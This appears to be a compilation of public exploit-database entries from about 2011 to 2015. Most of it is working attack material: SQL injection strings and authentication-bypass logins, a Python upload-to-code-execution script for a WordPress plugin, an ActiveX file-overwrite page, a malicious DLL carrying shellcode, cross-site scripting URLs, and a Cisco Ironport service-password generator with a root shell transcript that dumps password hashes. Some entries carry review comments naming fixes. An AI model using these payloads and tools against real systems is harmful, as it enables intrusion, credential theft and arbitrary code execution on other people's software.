
-
ecommerceMajor - SQL Injection / Authentication Bypass
################################################################################################## #Exploit Title : ecommercemajor ecommerce CMS SQL Injection and Authentication bypass #Author : Manish Kishan Tanwar #Home page Link : https://github.com/xlinkerz/ecommerceMajor #Date : 22/01/2015 #Discovered at : IndiShell Lab #Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,jagriti,Kishan Singh and ritu rathi #email : manish.1046@gmail.com ################################################################################################## //////////////////////// /// Overview: //////////////////////// ecommercemajor is a PHP-based CMS for ecommerce portals /////////////////////////////// // Vulnerability Description: /////////////////////////////// SQL injection vulnerability:- ============================== In file product.php, data from the GET parameter 'productbycat' is not filtered before being passed into the SQL query, giving rise to an SQL injection vulnerability --------------------- $getallproduct="select * from purchase where status='enable' and catid=$_GET[productbycat] order by id desc"; --------------------- POC http://127.0.0.1/ecommercemajor/product.php?productbycat=SQLI Authentication Bypass:- ============================== The file index.php under the directory __admin has an SQL injection vulnerability: the username and password supplied in POST parameters for checking a valid admin username and password are not filtered before being passed into the SQL query, which gives rise to an authentication bypass issue.
vulnerable code is ------------------- if(isset($_POST[login])) { $check="select * from adminlogin where username='$_POST[username]' and password='$_POST[username]'"; $checkresult=mysql_query($check); $checkcount=mysql_num_rows($checkresult); if($checkcount>0) { $checkrow=mysql_fetch_array($checkresult); $_SESSION[adminname]=$checkrow[adminname]; $_SESSION[adminloginstatus]="success"; echo "<script>window.location='home.php';</script>"; } -------------------- POC open admin panel http://127.0.0.1/ecommercemajor/__admin/ username: ' or '1337'='1337 password: ' or '1337'='1337 --==[[ Greetz To ]]==-- ############################################################################################ #Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba, #Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad, #Hackuin,Alicks,mike waals,Suriya Prakash, cyber gladiator,Cyber Ace,Golden boy INDIA, #Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Das ############################################################################################# --==[[Love to]]==-- #Kishan Tanwar,Mrs. Ritu Rathi,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi, #Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Don(Deepika kaushik) --==[[ Special Fuck goes to ]]==-- <3 suriya Cyber Tyson <3
-
WordPress Plugin Cforms 14.7 - Remote Code Execution
# Exploit Title: Remote Code Execution via Unauthorised File upload in Cforms 14.7
# Date: 2015-01-19
# Exploit Author: Zakhar
# Vendor Homepage: https://wordpress.org/plugins/cforms2/
# Software Link: https://downloads.wordpress.org/plugin/cforms2.zip
# Version: 14.7
# Tested on: Wordpress 4.0
# CVE : 2014-9473
#
# NOTE(review): Python 2 script (print statement, xrange). `re`, `base64` and
# `sys` are imported but never used below.
import os
import requests
import re
import base64
import sys
from lxml import etree
from optparse import OptionParser


def main():
    """Drive the Cforms II upload PoC from the command line.

    Fetches the page at ``--url``, discovers the cforms form number and the
    form's required fields from the HTML, submits the form with ``--file``
    attached under the name ``wow.php``, then probes ``--cforms-home-dir``
    for the stored file. Every failure path prints a message and returns 0.
    There is no login step anywhere in the flow; that is the "unauthorised"
    part of the title, and the defender-side fix is server-side validation
    of uploaded names/types plus storing uploads outside the web root --
    confirm against the vendor's fixed release.
    """
    print 'Cforms II File Upload + Remote Code Execution\n'
    # Filler values for required text / e-mail fields.
    text = 'Test text'
    text_mail = 'test@mail.com'
    parser = OptionParser()
    parser.add_option("-f", "--file", dest="file", help="file to upload", default = "itest.php", metavar="FILE")
    parser.add_option("-i", "--max-iterations", dest="iterations", help="Numbe of fields to iterate", default = "10")
    parser.add_option("-b", "--upload-file-name-bruteforce", dest="brute", help="Uploaded file name brute force", default = "10")
    parser.add_option("-n", "--cforms-form-number", dest="number", help="Cforms form number", default = "")
    parser.add_option("-c", "--cforms-home-dir", dest="home", help="Cforms form home dir", default = "/wp-content/plugins/cforms2/")
    parser.add_option("-u", "--url", dest="url", help="vulnerable url with contact form, example: http://127.0.0.1/Contact/")
    (opt, args) = parser.parse_args()
    options = opt.__dict__
    if not opt.url: # if url is not given
        parser.error('URL not given')
    if not opt.file:
        parser.error('file not given')
    filename = options["file"]
    # NOTE(review): `is not True` only works because isfile() returns a real
    # bool; `if not os.path.isfile(filename)` is the conventional spelling.
    if os.path.isfile(filename) is not True:
        print 'No such file '+filename
        return 0
    url = options['url']
    home = options["home"]
    i = options["iterations"]   # how many cfN_field_X ids to look for (string, int()'d below)
    n = options["number"]       # cforms form number; "" means auto-detect
    b = options["brute"]        # upper bound of the "<counter>-wow.php" probe loop
    s = requests.Session()
    r = s.get(url)
    if r.status_code != requests.codes.ok:
        print 'Error: website not found.'
        return 0
    tree = etree.HTML(r.text)
    # get cforms id
    # NOTE(review): `is ""` compares identity, not equality; it only works
    # because CPython interns the empty string. `n == ""` is the right test.
    if n is "":
        for x in xrange(2,10):
            for node in tree.xpath('//*[@id="cforms'+str(x)+'form"]'):
                if node is not None:
                    n = str(x)
                    break
    print 'Cforms form number is <'+n+'>'
    # Hidden inputs whose values are echoed back, and the candidate field ids.
    hidden = ['cf_working'+n,'cf_failure'+n,'cf_codeerr'+n,'cf_customerr'+n,'cf_popup'+n]
    fields = ['cf'+n+'_field_'+str(x) for x in xrange(1,int(i)+1)]
    required = {'sendbutton'+n:'1'}
    # Fill only the fields the page marks as required (class "fldrequired"),
    # using the e-mail filler when the class also contains "fldemail".
    for f in fields:
        for node in tree.xpath('//*[@id="' + f + '"]'):
            if node is not None:
                if 'fldrequired' in node.get('class'):
                    if 'fldemail' in node.get('class'):
                        required[f] = text_mail
                    else:
                        required[f] = text
    # Copy hidden input values verbatim.
    for h in hidden:
        for node in tree.xpath('//*[@id="' + h + '"]'):
            if node is not None:
                required[h] = node.get('value')
    # A captcha on the form is not handled by this script.
    for node in tree.xpath('//*[@id="cforms_captcha'+n+'"]'):
        if node is not None:
            print 'Error: Cforms uses captcha. Sorry, you have to exploit it manually.'
            return 0
    # Multipart upload under the form's file field; the attached name is 'wow.php'.
    # NOTE(review): the handle returned by open() is never closed.
    files = {'cf_uploadfile'+n+'[]':('wow.php',open(filename))}
    r = s.post(url,data=required,files=files)
    if r.status_code != requests.codes.ok:
        print 'Error: post error.'
        print r.status_code
        return 0
    else:
        # The stored name is either 'noid-wow.php' or '<counter>-wow.php'
        # inside the plugin directory (see the final message for 14.6.3+).
        url1 = url + home + 'noid-wow.php'
        flag = 0
        if s.get(url1).status_code != requests.codes.ok:
            for l in xrange(1,int(b)):
                url1 = url + home + str(l) + '-wow.php'
                print url1
                if s.get(url1).status_code == requests.codes.ok:
                    flag = 1
                    break
        else:
            flag = 1
        if flag == 1:
            print "Succes! Uploaded file: " + url1
        else:
            print "Uploaded file not found. Try to increase -b flag or change upload dir. 14.6.3 version and above use wordpress upload folder"
main()
-
LeadTools Imaging LEADSmtp - ActiveX Control 'SaveMessage()' Insecure Method
source: https://www.securityfocus.com/bid/48408/info LEADTOOLS Imaging LEADSmtp ActiveX control is prone to a vulnerability caused by an insecure method. Successfully exploiting this issue will allow attackers to create or overwrite files within the context of the affected application (typically Internet Explorer) that uses the ActiveX control. Attackers may execute arbitrary code with user-level privileges.
<html>
<!-- Instantiates the LEADSmtp control by CLSID so the script below can reach it as "target". -->
<object classid='clsid:0014085F-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>
' Boom: calls SaveMessage with a page-controlled path. Per the advisory above,
' the control writes the file where it is told, with the browser user's
' privileges, which is the "insecure method" being described.
' NOTE(review): the client-side mitigation is to stop web pages from
' instantiating this CLSID (kill bit / disabling the control in IE); confirm
' against the vendor advisory.
Sub Boom()
arg1="FilePath\Filename_to_overwrite"
arg2=True
target.SaveMessage arg1 ,arg2
End Sub
</script>
</html>
-
xAurora 10.00 - 'RSRC32.dll' DLL Loading Arbitrary Code Execution
/* source: https://www.securityfocus.com/bid/48432/info xAurora is prone to a vulnerability that lets attackers execute arbitrary code. An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file. */ #include <windows.h> #include <stdlib.h> #include <string.h> char shellcode[]="\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30" "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" "\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2" "\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85" "\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3" "\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d" "\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58" "\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b" "\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff" "\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00" "\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56" "\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75" "\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63" "\x2e\x65\x78\x65\x00"; int xAuroraPwnage() { int *ret; ret=(int *)&ret+2; (*ret)=(int)shellcode; MessageBox(0, "[+] xAurora Pwned By Zer0 Thunder !", "Not so Secured Browser", MB_OK); return 0; } BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved) { xAuroraPwnage(); return 0; }
-
Nodesforum - '_nodesforum_node' SQL Injection
source: https://www.securityfocus.com/bid/48451/info Nodesforum is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. http://www.example.com/?_nodesforum_node=u1'
-
Joomla! Component com_morfeoshow - 'idm' SQL Injection
source: https://www.securityfocus.com/bid/48452/info The 'com_morfeoshow' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/index.php?option=com_morfeoshow&task=view&gallery=1&Itemid=114&Itemid=114&idm=1015+and+1=0+union+select+1,2,concat%28username,0x3a,password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+jos_users+--+
-
Mambo 4.6.x - Multiple Cross-Site Scripting Vulnerabilities
source: https://www.securityfocus.com/bid/48455/info Mambo CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker can exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. Mambo CMS 4.6.5 is vulnerable; other versions may also be affected; http://www.example.com/mambo/index.php?option=com_content&task=%22%20style=width:1000px;height:1000px;top:0;left:0;position:absolute%20onmouseover=alert%28/XSS/%29%20&id=3&Itemid=32 http://www.example.com/mambo/administrator/index2.php?option=com_menumanager&task=edit&hidemainmenu=1&menu=Move+your+mouse+here%22%20style=position:absolute;width:1000px;height:1000px;top:0;left:0;%20onmouseover=alert%28/XSS/%29%20 http://www.example.com/mambo/administrator/index2.php?option=com_menus&menutype=xss"%20style%3dx%3aexpression(alert(/XSS/))%20XSSSSSSSS http://www.example.com/mambo/administrator/index2.php?option=com_menus&menutype=xss"%20%20%20style=background-image:url('javascript:alert(/XSS/)');width:1000px;height:1000px;display:block;%20x=%20XSSSSSSSS http://www.example.com/mambo/administrator/index2.php?limit=10&order%5b%5d=11&boxchecked=0&toggle=on&search=simple_search&task=&limitstart=0&cid%5b%5d=on&zorder=c.ordering+DESC"><script>alert(/XSS/)</script>&filter_authorid=62&hidemainmenu=0&option=com_typedcontent http://www.example.com/mambo/administrator/index2.php?limit=10&boxchecked=0&toggle=on&search=xss"><script>alert(/XSS/)</script>&task=&limitstart=0&hidemainmenu=0&option=com_comment http://www.example.com/mambo/administrator/index2.php?option=com_modules&client=%27%22%20onmouseover=alert%28/XSS/%29%20a=%22%27 
http://www.example.com/mambo/administrator/index2.php?option=com_categories§ion=com_weblinks"%20style%3dx%3aexpression(alert(/XSS/))%20XSSSSSSSS&task=editA&hidemainmenu=1&id=2 http://www.example.com/mambo/administrator/index2.php?option=com_categories§ion=com_weblinks"%20style%3d-moz-binding:url(http://www.businessinfo.co.uk/labs/xbl/xbl.xml%23xss)%20XSSSSSSSS&task=editA&hidemainmenu=1&id=2 http://www.example.com/mambo/administrator/index2.php?option=com_categories§ion=com_weblinks"%20%20style=background-image:url('javascript:alert(0)');width:1000px;height:1000px;display:block;%20x=%20XSSSSSSSS&task=editA&hidemainmenu=1&id=2 http://www.example.com/mambo/administrator/index2.php?option=com_categories§ion=com_weblinks"%20%20style=background-image:url(javascript:alert(0));width:1000px;height:1000px;dis http://www.example.com/mambo/administrator/index2.php?option=com_categories§ion=com_weblinks"%20%20style=background-image:url(javascript:alert(0));width:1000px;height:1000px;display:block;%20x=%20XSSSSSSSS&task=editA&hidemainmenu=1&id=2
-
Ubisoft CoGSManager ActiveX Control 1.0.0.23 - 'Initialize()' Method Stack Buffer Overflow
source: https://www.securityfocus.com/bid/48462/info Ubisoft CoGSManager ActiveX control is prone to a remote stack-based buffer-overflow vulnerability because the application fails to properly bounds check user-supplied input. Attackers can exploit this issue to execute arbitrary code within the context of an application (typically Internet Explorer) that uses the ActiveX control. Failed exploit attempts will result in a denial-of-service condition. Ubisoft CoGSManager ActiveX control 1.0.0.23 is vulnerable. https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35885.zip
-
Sybase Advantage Server 10.0.0.3 - 'ADS' Process Off-by-One Buffer Overflow
source: https://www.securityfocus.com/bid/48464/info Sybase Advantage Server is prone to an off-by-one buffer-overflow vulnerability. Attackers may exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts may result in a denial-of-service condition. Sybase Advantage Server 10.0.0.3 is vulnerable; other versions may also be affected. https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35886.zip ####################################################################### Luigi Auriemma Application: Sybase Advantage Server http://www.sybase.com/products/databasemanagement/advantagedatabaseserver Versions: <= 10.0.0.3 Platforms: Windows, NetWare, Linux Bug: off-by-one Exploitation: remote, versus server Date: 27 Jun 2011 (found 29 Oct 2010) Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bug 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== From vendor's website: "Advantage Database Server is a full-featured, easily embedded, client-server, relational database management system that provides you with Indexed Sequential Access Method (ISAM) table-based and SQL-based data access." ####################################################################### ====== 2) Bug ====== By default the Advantage server (ADS process) listens on the UDP and TCP ports 6262 and optionally is possible to specify also a so called "internet port" for non-LAN connections. The problem is enough unusual and affects the code that handles a certain type of packets on the UDP port. 
In short the server does the following: - it uses memcpy to copy the data from the packet into a stack buffer of exactly 0x2b8 bytes (handled as 0x2b9 bytes) - later this data is handled as a string but no final NULL byte delimiter is inserted - there is also an off-by-one bug since one byte overwrites the lower 8bit value of a saved element (a stack pointer 017bff??) - after this buffer are located some pushed elements and obviously the return address of the function - it calls the OemToChar API that changes some bytes of the buffer (like those major than 0x7f) till it reaches a 0x00 that "luckily" is after the return address - so also the return address gets modified, exactly from 0084cb18 to 00e42d18 that ironically is a valid stack frame somewhat related to the starting of the service - the data inside this stack address doesn't seems changeable from outside and has tons of 0x00 bytes that in this case act like NOPs till the zone around 00ebf05b where are located some pushed elements - the EBX register contains two bytes of the attacker's data and EBP points to such data the following is a resume of these operations: 017BF66B 61 61 61 61 61 61 61 61 61 61 61 61 61 61 FF 7B aaaaaaaaaaaaaa�{ 017BF67B 01 99 26 C1 71 BC F6 7B 01 18 CB 84 00 00 00 00 .�&�q��{..˄.... |---------| original return address 0084B81D |. FF15 DC929000 CALL DWORD PTR DS:[<&USER32.OemToCharA>] 017BF66B 61 61 61 61 61 61 61 61 61 61 61 61 61 61 A0 7B aaaaaaaaaaaaaa�{ 017BF67B 01 D6 26 2D 71 2B F7 7B 01 18 2D E4 00 00 00 00 .�&-q+�{..-�.... |---------| new return address 00E42D18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00E42D28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ ... 00EBF04B 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00EBF05B 00 99 78 82 7C 4A EC 82 7C 20 00 00 00 A0 F0 EB .�x�|J��| ...��� 00EBF06B 00 A0 F0 EB 00 00 00 00 00 68 F1 EB 00 01 00 00 .���.....h��.... 
00EBF07B 00 5C F1 EB 00 D1 0F E7 77 A0 F0 EB 00 00 00 00 .\��.�.�w���.... 00EBF08B 00 51 02 02 00 EC 0F E7 77 00 D0 FD 7F 00 00 00 .Q...�.�w.��... 00EBF09B 00 01 00 00 00 18 00 34 00 02 00 00 00 7C 0A 00 .......4.....|.. 00EBF0AB 00 14 0D 00 00 1C 75 17 00 00 00 00 00 00 00 00 ......u......... 00EBF0BB 00 51 02 02 00 08 00 00 C0 00 00 00 00 00 00 00 .Q......�....... the code flow usually arrives till 00ebf0ab or other addresses close to it depending by the data saved there when the service started. Now for exploiting this vulnerability would be required the presence of a "jmp ebp" or "call ebp" or a sequence of instructions with a similar result in the 00ebf05b zone which looks like an enough rare event. I have not tested the Linux and NetWare platforms so I don't know if the problem exists also there and if there are more chances of exploiting it. ####################################################################### =========== 3) The Code =========== http://aluigi.org/testz/udpsz.zip http://aluigi.org/poc/ads_crc.zip udpsz -C 0012 -L ads_crc.dll -b 0x61 SERVER 6262 0x592 ####################################################################### ====== 4) Fix ====== No fix. UPDATE: vendor has fixed the bug in version 10.10.0.16 released in July 2011: http://devzone.advantagedatabase.com/dz/content.aspx?key=44&id=ef0915fb-44c2-fe4b-ac26-9ed3359cffff #######################################################################
-
Joomla! Component Minitek FAQ Book 1.3 - 'id' SQL Injection
source: https://www.securityfocus.com/bid/48223/info Joomla Minitek FAQ Book is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. Joomla Minitek FAQ Book 1.3 is vulnerable; other versions may also be affected. http://www.example.com/demo16/faq-book?view=category&id=-7+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,username,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+jos_users--
-
Cisco Ironport Appliances - Privilege Escalation
/* Cisco Ironport Appliances Privilege Escalation Vulnerability Vendor: Cisco Product webpage: http://www.cisco.com Affected version(s): Cisco Ironport ESA - AsyncOS 8.5.5-280 Cisco Ironport WSA - AsyncOS 8.0.5-075 Cisco Ironport SMA - AsyncOS 8.3.6-0 Date: 22/05/2014 Credits: Glafkos Charalambous CVE: Not assigned by Cisco Disclosure Timeline: 19-05-2014: Vendor Notification 20-05-2014: Vendor Response/Feedback 27-08-2014: Vendor Fix/Patch 24-01-2015: Public Disclosure Description: Cisco Ironport appliances are vulnerable to authenticated "admin" privilege escalation. By enabling the Service Account from the GUI or CLI allows an admin to gain root access on the appliance, therefore bypassing all existing "admin" account limitations. The vulnerability is due to weak algorithm implementation in the password generation process which is used by Cisco to remotely access the appliance to provide technical support. Vendor Response: As anticipated, this is not considered a vulnerability but a security hardening issue. As such we did not assign a CVE however I made sure that this is fixed on SMA, ESA and WSA. The fix included several changes such as protecting better the algorithm in the binary, changing the algorithm itself to be more robust and enforcing password complexity when the administrator set the pass-phrase and enable the account. [SD] Note: Administrative credentials are needed in order to activate the access to support representative and to set up the pass-phrase that it is used to compute the final password. [GC] Still Admin user has limited permissions on the appliance and credentials can get compromised too, even with default password leading to full root access. 
[SD] This issue is tracked for the ESA by Cisco bug id: CSCuo96011 for the SMA by Cisco bug id: CSCuo96056 and for WSA by Cisco bug id CSCuo90528 Technical Details: By logging in to the appliance using default password "ironport" or user specified one, there is an option to enable Customer Support Remote Access. This option can be found under Help and Support -> Remote Access on the GUI or by using the CLI console account "enablediag" and issuing the command service. Enabling this service requires a temporary user password which should be provided along with the appliance serial number to Cisco techsupport for remotely connecting and authenticating to the appliance. Having a temporary password and the serial number of the appliance by enabling the service account, an attacker can in turn get full root access as well as potentially damage it, backdoor it, etc. PoC: Enable Service Account ---------------------- root@kali:~# ssh -lenablediag 192.168.0.158 Password: Last login: Sat Jan 24 15:47:07 2015 from 192.168.0.163 Copyright (c) 2001-2013, Cisco Systems, Inc. AsyncOS 8.5.5 for Cisco C100V build 280 Welcome to the Cisco C100V Email Security Virtual Appliance Available Commands: help -- View this text. quit -- Log out. service -- Enable or disable access to the service system. network -- Perform emergency configuration of the diagnostic network interface. clearnet -- Resets configuration of the diagnostic network interface. ssh -- Configure emergency SSH daemon on the diagnostic network interface. clearssh -- Stop emergency SSH daemon on the diagnostic network interface. tunnel -- Start up tech support tunnel to IronPort. print -- Print status of the diagnostic network interface. reboot -- Reboot the appliance. S/N 564DDFABBD0AD5F7A2E5-2C6019F508A4 Service Access currently disabled. ironport.example.com> service Service Access is currently disabled. 
Enabling this system will allow an IronPort Customer Support representative to remotely access your system to assist you in solving your technical issues. Are you sure you want to do this? [Y/N]> Y Enter a temporary password for customer support to use. This password may not be the same as your admin password. This password will not be able to be used to directly access your system. []> cisco123 Service access has been ENABLED. Please provide your temporary password to your IronPort Customer Support representative. S/N 564DDFABBD0AD5F7A2E5-2C6019F508A4 Service Access currently ENABLED (0 current service logins) ironport.example.com> Generate Service Account Password --------------------------------- Y:\Vulnerabilities\cisco\ironport>woofwoof.exe Usage: woofwoof.exe -p password -s serial -p <password> | Cisco Service Temp Password -s <serial> | Cisco Serial Number -h | This Help Menu Example: woofwoof.exe -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019F508A4 Y:\Vulnerabilities\cisco\ironport>woofwoof.exe -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019 F508A4 Service Password: b213c9a4 Login to the appliance as Service account with root privileges -------------------------------------------------------------- root@kali:~# ssh -lservice 192.168.0.158 Password: Last login: Wed Dec 17 21:15:24 2014 from 192.168.0.10 Copyright (c) 2001-2013, Cisco Systems, Inc. 
AsyncOS 8.5.5 for Cisco C100V build 280 Welcome to the Cisco C100V Email Security Virtual Appliance # uname -a FreeBSD ironport.example.com 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Fri Mar 14 08:04:05 PDT 2014 auto-build@vm30esa0109.ibeng:/usr/build/iproot/freebsd/mods/src/sys/amd64/compile/MESSAGING_GATEWAY.amd64 amd64 # cat /etc/master.passwd # $Header: //prod/phoebe-8-5-5-br/sam/freebsd/install/dist/etc/master.passwd#1 $ root:*:0:0::0:0:Mr &:/root:/sbin/nologin service:$1$bYeV53ke$Q7hVZA5heeb4fC1DN9dsK/:0:0::0:0:Mr &:/root:/bin/sh enablediag:$1$VvOyFxKd$OF2Cs/W0ZTWuGTtMvT5zc/:999:999::0:0:Administrator support access control:/root:/data/bin/enablediag.sh adminpassword:$1$aDeitl0/$BlmzKUSeRXoc4kcuGzuSP/:0:1000::0:0:Administrator Password Tool:/data/home/admin:/data/bin/adminpassword.sh daemon:*:1:1::0:0:Owner of many system processes:/root:/sbin/nologin operator:*:2:5::0:0:System &:/:/sbin/nologin bin:*:3:7::0:0:Binaries Commands and Source,,,:/:/sbin/nologin tty:*:4:65533::0:0:Tty Sandbox:/:/sbin/nologin kmem:*:5:65533::0:0:KMem Sandbox:/:/sbin/nologin man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/sbin/nologin sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/sbin/nologin nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/sbin/nologin support:$1$FgFVb064$SmsZv/ez7Pf4wJLp5830s/:666:666::0:0:Mr &:/root:/sbin/nologin admin:$1$VvOyFxKd$OF2Cs/W0ZTWuGTtMvT5zc/:1000:1000::0:0:Administrator:/data/home/admin:/data/bin/cli.sh clustercomm:*:900:1005::0:0:Cluster Communication User:/data/home/clustercomm:/data/bin/command_proxy.sh smaduser:*:901:1007::0:0:Smad User:/data/home/smaduser:/data/bin/cli.sh spamd:*:783:1006::0:0:CASE User:/usr/case:/sbin/nologin pgsql:*:70:70::0:0:PostgreSQL pseudo-user:/usr/local/pgsql:/bin/sh ldap:*:389:389::0:0:OpenLDAP Server:/nonexistent:/sbin/nologin */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <ctype.h> #include "md5.h" #include "getopt.h" #define MAX_BUFFER 128 #define SECRET_PASS "woofwoof" void usage(char 
*name);
void to_lower(char *str);
void fuzz_string(char *str);

/*
 * Reproduce the "service" account password from the admin-chosen temporary
 * password (-p) and the appliance serial number (-s).
 *
 * The derivation visible below is: normalise both inputs, concatenate
 * temp_pass || serial_no || SECRET_PASS, MD5 the string and print the first
 * four digest bytes as 8 hex characters (this matches "b213c9a4" in the
 * PoC transcript above). Nothing in the computation is secret except the
 * SECRET_PASS constant, which is why the advisory treats this as privilege
 * escalation: whoever can enable the service account and read the serial
 * number can derive the root-level password. The vendor response above
 * describes the fix (stronger algorithm, pass-phrase complexity).
 *
 * Returns 0; usage() exits the process on bad or missing arguments.
 */
int main(int argc, char *argv[])
{
    if (argc < 2) {
        usage(argv[0]);
    }
    int opt;
    int index;
    char *temp_pass = { 0 };
    char *serial_no = { 0 };
    char *secret_pass = SECRET_PASS;
    char service[MAX_BUFFER] = { 0 };
    unsigned char digest[16] = { 0 };
    while ((opt = getopt(argc, argv, "p:s:h")) != -1) {
        switch (opt) {
        case 'p':
            temp_pass = optarg;
            break;
        case 's':
            serial_no = optarg;
            break;
        case 'h':
            usage(argv[0]);
            break;
        default:
            /* NOTE(review): reports argv[1], not the option getopt rejected. */
            printf_s("Wrong Argument: %s\n", argv[1]);
            break;
        }
    }
    /* Any left-over positional argument is treated as a usage error. */
    for (index = optind; index < argc; index++) {
        usage(argv[0]);
        exit(0);
    }
    if (temp_pass == NULL || serial_no == NULL) {
        usage(argv[0]);
        exit(0);
    }
    /* NOTE(review): each input is bounded by sizeof(service) on its own, not
     * their sum. strcat_s's size argument still prevents an overflow, but an
     * over-long combination would hit the CRT's invalid-parameter handling
     * instead of a clear error message. */
    if ((strlen(temp_pass) <= sizeof(service)) && (strlen(serial_no) <= sizeof(service))) {
        to_lower(serial_no);      /* presumably the serial is matched case-insensitively */
        fuzz_string(temp_pass);   /* '1'->'i', '0'->'o', '_'->'-' */
        strcpy_s(service, sizeof(service), temp_pass);
        strcat_s(service, sizeof(service), serial_no);
        strcat_s(service, sizeof(service), secret_pass);
        MD5_CTX context;
        MD5_Init(&context);
        MD5_Update(&context, service, strlen(service));
        MD5_Final(digest, &context);
        printf_s("Service Password: ");
        /* sizeof(digest)-12 == 4: only the first four digest bytes are printed. */
        for (int i = 0; i < sizeof(digest)-12; i++)
            printf("%02x", digest[i]);
    }
    return 0;
}

/* Rewrite str in place: '1' -> 'i', '0' -> 'o', '_' -> '-'; every other
 * character is left as is. Presumably mirrors the appliance's own
 * normalisation of the temporary password. */
void fuzz_string(char *str)
{
    while (*str){
        switch (*str) {
        case '1':
            *str = 'i';
            break;
        case '0':
            *str = 'o';
            break;
        case '_':
            *str = '-';
            break;
        }
        str++;
    }
}

/* Lower-case ASCII 'A'..'Z' in place by adding 0x20; other bytes untouched. */
void to_lower(char *str)
{
    while (*str) {
        if (*str >= 'A' && *str <= 'Z') {
            *str += 0x20;
        }
        str++;
    }
}

/* Print the help text and exit(0). */
void usage(char *name)
{
    printf_s("\nUsage: %s -p password -s serial\n", name);
    printf_s(" -p <password> | Cisco Service Temp Password\n");
    printf_s(" -s <serial> | Cisco Serial Number\n");
    printf_s(" -h | This Help Menu\n");
    printf_s("\n Example: %s -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019F508A4\n", name);
    exit(0);
}
-
RedaxScript 2.1.0 - Privilege Escalation
# Exploit Title: Privilege Escalation in RedaxScript 2.1.0 # Date: 11-05-2014 # Exploit Author: shyamkumar somana # Vendor Homepage: http://redaxscript.com/ # Version: 2.1.0 # Tested on: Windows 8 #Privilege Escalation in RedaxScript 2.1.0 RedaxScript 2.1.0 suffers from a privilege escalation vulnerability. The issue occurs because the application fails to properly implement access controls. The application also fails to perform proper sanity checks on the user-supplied input before processing it. These two flaws lead to a vertical privilege escalation. This can be achieved by simply tampering with the parameter values. An attacker can exploit this issue to gain elevated privileges in the application. *Steps to reproduce the instance:* · Log in as a non-admin user · Go to account and update the account. · Intercept the request and add “*groups[]=1*” to the POST data and submit the request · Log out of the application and log in again. You can now browse the application with admin privileges. This vulnerability was addressed in the following commit. https://github.com/redaxmedia/redaxscript/commit/bfe146f98aedb9d169ae092b49991ed1b3bc0860?diff=unified *Timeline*: 09-26-2014: Issue identified 09-27-2014: Discussion with the vendor 10-27-2014: Issue confirmed 11-05-2014: Patch released. Author: Shyamkumar Somana Vendor Homepage: http://redaxscript.com/download Version: 2.1.0 Tested on: Windows 7 -- [image: --] shyam kumar [image: http://]about.me/shyamkumar.somana 